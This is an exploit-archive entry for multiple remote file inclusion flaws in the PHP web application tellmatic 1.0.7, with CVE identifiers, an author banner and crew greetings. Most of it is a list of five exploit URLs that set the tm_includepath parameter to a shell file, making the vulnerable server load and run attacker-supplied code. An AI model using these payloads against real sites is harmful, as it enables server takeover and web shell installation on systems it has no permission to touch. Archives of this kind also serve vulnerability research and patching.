EXPLOITS

tellmatic 1.0.7 - Multiple Remote File Inclusions

Author: ShAy6oOoN
type: webapps
platform: php
port: 
date_added: 2007-11-30  
date_updated:   
verified: 1  
codes: OSVDB-39693;CVE-2007-6232;OSVDB-39692;OSVDB-39691;OSVDB-39690;OSVDB-39689;CVE-2007-6231  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4684.txt  

~~~~~~~~~~~~~~~~~~~~~~
~ tellmatic 1.0.7 RFI ~
~~~~~~~~~~~~~~~~~~~~~~

---------------------
Author              : ShAy6oOoN
---------------------
Group               : PitBull Crew
---------------------
Script              : tellmatic 1.0.7
---------------------
Download            : http://downloads.sourceforge.net/tellmatic/tellmatic-1.0.7.tgz?modtime=1196381865&big_mirror=0
---------------------
Vulnerability Type  : Remote File Inclusion
---------------------
Method              : get
---------------------
Register_globals    : On
---------------------
Exploit URL's       :
---------------------

http://localhost/tellmatic/include/Classes.inc.php?tm_includepath=http://localhost/shell.txt?

http://localhost/tellmatic/include/statistic.inc.php?tm_includepath=http://localhost/shell.txt?

http://localhost/tellmatic/include/status.inc.php?tm_includepath=http://localhost/shell.txt?

http://localhost/tellmatic/include/status_top_x.inc.php?tm_includepath=http://localhost/shell.txt?

http://localhost/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://localhost/shell.txt?


Greetings:
----------

PitBull Crew : The_PitBull - iNs - c0ol - Raz0r


Thanks To:
----------

str0ke

# milw0rm.com [2007-12-01]